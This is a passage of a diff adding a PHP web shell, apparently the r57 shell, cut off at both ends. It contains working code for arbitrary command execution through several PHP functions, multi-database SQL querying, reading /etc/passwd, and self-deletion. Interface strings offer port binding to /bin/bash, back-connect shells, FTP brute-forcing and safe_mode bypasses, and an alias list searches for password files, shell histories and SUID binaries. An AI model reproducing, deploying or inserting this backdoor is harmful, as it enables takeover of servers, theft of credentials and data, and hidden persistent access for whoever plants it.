compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mysql_query($query,$db); + $error = @mysql_error($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@mysql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mysql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = 
@mysql_affected_rows($db))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @mysql_free_result($res); + } + } + @mysql_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to MySQL server</b></font></div>"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @mssql_query($query,$db); + if (@mssql_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @mssql_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; }} */ + @mssql_free_result($res); + } + } + @mssql_close($db); + } + else echo "<div 
align=center><font face=Verdana size=-2 color=red><b>Can't connect to MSSQL server</b></font></div>"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5){ + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $res = @pg_query($db,$query); + $error = @pg_errormessage($db); + if($error) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error."</b></font></td></tr></table><br>"; } + else { + if (@pg_num_rows($res) > 0) + { + $sql2 = $sql = $keys = $values = ''; + while (($row = @pg_fetch_assoc($res))) + { + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$values); + $sql2 .= "<tr><td><font face=Verdana size=-2>&nbsp;".$values."&nbsp;</font></td></tr>"; + } + echo "<table width=100%>"; + $sql = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + $sql .= $sql2; + echo $sql; + echo "</table><br>"; + } + else { if(($rows = @pg_affected_rows($res))>=0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rows."</b></font></td></tr></table><br>"; } } + } + @pg_free_result($res); + } + } + @pg_close($db); + } + else echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; + break; + case 'Oracle': + $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], 
$_POST['mysql_db']); + if(($error = @ocierror())) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>".$error['message']."</b></font></div>"; } + else + { + $querys = @explode(';',$_POST['db_query']); + foreach($querys as $num=>$query) + { + if(strlen($query)>5) { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query)."</b></font><br>"; + $stat = @ociparse($db, $query); + @ociexecute($stat); + if(($error = @ocierror())) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$error['message']."</b></font></td></tr></table><br>"; } + else + { + $rowcount = @ocirowcount($stat); + if($rowcount != 0) {echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$rowcount."</b></font></td></tr></table><br>";} + else { + echo "<table width=100%><tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".htmlspecialchars(@ocicolumnname($stat, $j))."&nbsp;</b></font></td>"; } + echo "</tr>"; + while(ocifetch($stat)) + { + echo "<tr>"; + for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2>&nbsp;".htmlspecialchars(@ociresult($stat, $j))."&nbsp;</font></td>"; } + echo "</tr>"; + } + echo "</table><br>"; + } + @ocifreestatement($stat); + } + } + } + @ocilogoff($db); + } + break; + } + echo "<form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo 
"</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} 
+if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'??????????? ???????', +'ru_text2' =>'?????????? ?????? ?? ???????', +'ru_text3' =>'????????? ???????', +'ru_text4' =>'??????? ??????????', +'ru_text5' =>'???????? ?????? ?? ??????', +'ru_text6' =>'????????? 
????', +'ru_text7' =>'??????', +'ru_text8' =>'???????? ?????', +'ru_butt1' =>'?????????', +'ru_butt2' =>'?????????', +'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', +'ru_text10'=>'??????? ????', +'ru_text11'=>'?????? ??? ???????', +'ru_butt3' =>'???????', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-?????', +'ru_text14'=>'????', +'ru_butt4' =>'?????????', +'ru_text15'=>'???????? ?????? ? ?????????? ???????', +'ru_text16'=>'????????????', +'ru_text17'=>'????????? ????', +'ru_text18'=>'????????? ????', +'ru_text19'=>'Exploits', +'ru_text20'=>'????????????', +'ru_text21'=>'????? ???', +'ru_text22'=>'datapipe', +'ru_text23'=>'????????? ????', +'ru_text24'=>'????????? ????', +'ru_text25'=>'????????? ????', +'ru_text26'=>'????????????', +'ru_butt5' =>'?????????', +'ru_text28'=>'?????? ? safe_mode', +'ru_text29'=>'?????? ????????', +'ru_butt6' =>'???????', +'ru_text30'=>'???????? ?????', +'ru_butt7' =>'???????', +'ru_text31'=>'???? ?? ??????', +'ru_text32'=>'?????????? PHP ????', +'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL', +'ru_butt8' =>'?????????', +'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', +'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', +'ru_text36'=>'????', +'ru_text37'=>'?????', +'ru_text38'=>'??????', +'ru_text39'=>'???????', +'ru_text40'=>'???? ??????? ???? ??????', +'ru_butt9' =>'????', +'ru_text41'=>'????????? ? ?????', +'ru_text42'=>'?????????????? ?????', +'ru_text43'=>'????????????? ????', +'ru_butt10'=>'?????????', +'ru_butt11'=>'?????????????', +'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', +'ru_text45'=>'???? ????????', +'ru_text46'=>'???????? phpinfo()', +'ru_text47'=>'???????? ???????? php.ini', +'ru_text48'=>'???????? ????????? ??????', +'ru_text49'=>'???????? ??????? ? ???????', +'ru_text50'=>'?????????? ? ??????????', +'ru_text51'=>'?????????? ? ??????', +'ru_text52'=>'????? 
??? ??????', +'ru_text53'=>'?????? ? ?????', +'ru_text54'=>'????? ?????? ? ??????', +'ru_butt12'=>'?????', +'ru_text55'=>'?????? ? ??????', +'ru_text56'=>'?????? ?? ???????', +'ru_text57'=>'???????/??????? ????/??????????', +'ru_text58'=>'???', +'ru_text59'=>'????', +'ru_text60'=>'??????????', +'ru_butt13'=>'???????/???????', +'ru_text61'=>'???? ??????', +'ru_text62'=>'?????????? ???????', +'ru_text63'=>'???? ??????', +'ru_text64'=>'?????????? ???????', +'ru_text65'=>'???????', +'ru_text66'=>'???????', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'???????', +'ru_text69'=>'????????1', +'ru_text70'=>'????????2', +'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)", +'ru_text72'=>'????? ??? ??????', +'ru_text73'=>'?????? ? ?????', +'ru_text74'=>'?????? ? ??????', +'ru_text75'=>'* ????? ???????????? ?????????? ?????????', +'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', +'ru_text77'=>'???????? ????????? ???? ??????', +'ru_text78'=>'?????????? ???????', +'ru_text79'=>'?????????? ???????', +'ru_text80'=>'???', +'ru_text81'=>'????', +'ru_text82'=>'???? ??????', +'ru_text83'=>'?????????? SQL ???????', +'ru_text84'=>'SQL ??????', +'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????', +'ru_text86'=>'?????????? ????? ? ???????', +'ru_butt14'=>'???????', +'ru_text87'=>'???????? ?????? ? ?????????? ftp-???????', +'ru_text88'=>'FTP-??????:????', +'ru_text89'=>'???? ?? ftp ???????', +'ru_text90'=>'????? ????????', +'ru_text91'=>'???????????? ?', +'ru_text92'=>'??? ?????????', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-????????', +'ru_text95'=>'?????? ?????????????', +'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', +'ru_text97'=>'????????? ??????????: ', +'ru_text98'=>'??????? ???????????: ', +'ru_text99'=>'* ? ???????? 
?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd', +'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', +'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????', +'ru_text102'=>'?????', +'ru_text103'=>'???????? ??????', +'ru_text104'=>'???????? ????? ?? ???????? ????', +'ru_text105'=>'????', +'ru_text106'=>'??', +'ru_text107'=>'????', +'ru_butt15'=>'?????????', +'ru_text108'=>'????? ??????', +'ru_text109'=>'????????', +'ru_text110'=>'??????????', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' =>'Select alias', +'eng_butt1' =>'Execute', +'eng_butt2' =>'Upload', +'eng_text9' =>'Bind port to /bin/bash', +'eng_text10'=>'Port', +'eng_text11'=>'Password for access', +'eng_butt3' =>'Bind', +'eng_text12'=>'back-connect', +'eng_text13'=>'IP', +'eng_text14'=>'Port', +'eng_butt4' =>'Connect', +'eng_text15'=>'Upload files from remote server', +'eng_text16'=>'With', +'eng_text17'=>'Remote file', +'eng_text18'=>'Local file', +'eng_text19'=>'Exploits', +'eng_text20'=>'Use', +'eng_text21'=>'&nbsp;New name', +'eng_text22'=>'datapipe', +'eng_text23'=>'Local port', +'eng_text24'=>'Remote host', +'eng_text25'=>'Remote port', +'eng_text26'=>'Use', +'eng_butt5' =>'Run', +'eng_text28'=>'Work in safe_mode', +'eng_text29'=>'ACCESS DENIED', +'eng_butt6' =>'Change', +'eng_text30'=>'Cat file', +'eng_butt7' =>'Show', +'eng_text31'=>'File not found', +'eng_text32'=>'Eval PHP code', +'eng_text33'=>'Test bypass open_basedir with cURL functions', +'eng_butt8' =>'Test', +'eng_text34'=>'Test bypass safe_mode with include function', +'eng_text35'=>'Test bypass safe_mode with load file in mysql', +'eng_text36'=>'Database', +'eng_text37'=>'Login', +'eng_text38'=>'Password', 
+'eng_text39'=>'Table', +'eng_text40'=>'Dump database table', +'eng_butt9' =>'Dump', +'eng_text41'=>'Save dump in file', +'eng_text42'=>'Edit files', +'eng_text43'=>'File for edit', +'eng_butt10'=>'Save', +'eng_text44'=>'Can\'t edit file! Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', +'eng_text86'=>'Download files from server', +'eng_butt14'=>'Download', +'eng_text87'=>'Download files from remote ftp-server', +'eng_text88'=>'FTP-server:port', +'eng_text89'=>'File on ftp', 
+'eng_text90'=>'Transfer mode', +'eng_text91'=>'Archivation', +'eng_text92'=>'without archivation', +'eng_text93'=>'FTP', +'eng_text94'=>'FTP-bruteforce', +'eng_text95'=>'Users list', +'eng_text96'=>'Can\'t get users list', +'eng_text97'=>'checked: ', +'eng_text98'=>'success: ', +'eng_text99'=>'* use username from /etc/passwd for ftp login and password', +'eng_text100'=>'Send file to remote ftp server', +'eng_text101'=>'Use reverse (user -> resu) login for password', +'eng_text102'=>'Mail', +'eng_text103'=>'Send email', +'eng_text104'=>'Send file to email', +'eng_text105'=>'To', +'eng_text106'=>'From', +'eng_text107'=>'Subj', +'eng_butt15'=>'Send', +'eng_text108'=>'Mail', +'eng_text109'=>'Hide', +'eng_text110'=>'Show', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . -type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . 
-perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>?</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if(isset($_GET['users'])) + { + if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; } + else + { + echo '<center>'; + foreach($users as $user) { echo $user."<br>"; } + echo '</center>'; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } + +if 
(!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? 
str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function get_users() +{ + $users = array(); + $rows=file('/etc/passwd'); + if(!$rows) return 0; + foreach ($rows as $string) + { + $user = @explode(":",$string); + if(substr($string,0,1)!='#') array_push($users,$user[0]); + } + return $users; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } +else { $text = "[-] ERROR! 
Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ????????? ???? '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function fe($l,$n) +{ +$text['ru'] = array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'); +$text['eng'] = array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function mr($l,$n) +{ +$text['ru'] = array('?? ??????? ????????? ??????','?????? 
??????????'); +$text['eng'] = array('Can\'t send mail','Mail sent'); +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text[$l][$n]."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') 